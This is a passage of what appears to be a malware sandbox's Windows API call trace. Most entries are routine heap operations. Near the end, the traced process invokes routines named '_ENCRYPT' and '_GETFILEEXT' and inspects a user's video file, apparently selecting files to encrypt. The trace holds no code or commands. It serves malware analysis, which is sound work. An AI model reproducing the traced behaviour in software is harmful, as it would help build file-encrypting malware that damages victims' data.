returned 0x8e1890 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0199.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0199.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0199.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0199.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0199.332] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0199.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0199.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0199.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.334] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0199.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0199.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0199.334] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0199.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0199.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0199.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0199.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0199.335] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0199.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0199.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0199.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0199.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0199.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0199.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.336] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0199.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0199.336] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bdab0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0199.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0199.337] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0199.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0199.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0199.337] CloseHandle (hObject=0x160) returned 1 [0199.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0199.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0199.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0199.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0199.345] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0199.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0199.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0199.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0199.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0199.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0199.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0199.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0199.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0199.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0199.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.346] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0199.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0199.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0199.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.346] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.346] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0199.346] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.346] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0199.346] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0199.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.346] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.347] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.347] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.347] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a38ea0, ftCreationTime.dwHighDateTime=0x1d5e37a, ftLastAccessTime.dwLowDateTime=0x39e54bc0, ftLastAccessTime.dwHighDateTime=0x1d5deab, ftLastWriteTime.dwLowDateTime=0x39e54bc0, ftLastWriteTime.dwHighDateTime=0x1d5deab, nFileSizeHigh=0x0, nFileSizeLow=0x28d3, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gUuRkOGgEOvL1Ts9uT.mp4", cAlternateFileName="GUURKO~1.MP4")) returned 0x90add8 [0199.347] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0199.347] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.347] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a38ea0, ftCreationTime.dwHighDateTime=0x1d5e37a, ftLastAccessTime.dwLowDateTime=0x39e54bc0, ftLastAccessTime.dwHighDateTime=0x1d5deab, ftLastWriteTime.dwLowDateTime=0x39e54bc0, ftLastWriteTime.dwHighDateTime=0x1d5deab, nFileSizeHigh=0x0, nFileSizeLow=0x28d3, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gUuRkOGgEOvL1Ts9uT.mp4", cAlternateFileName="GUURKO~1.MP4")) returned 0x90add8 [0199.347] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0199.347] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0199.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS 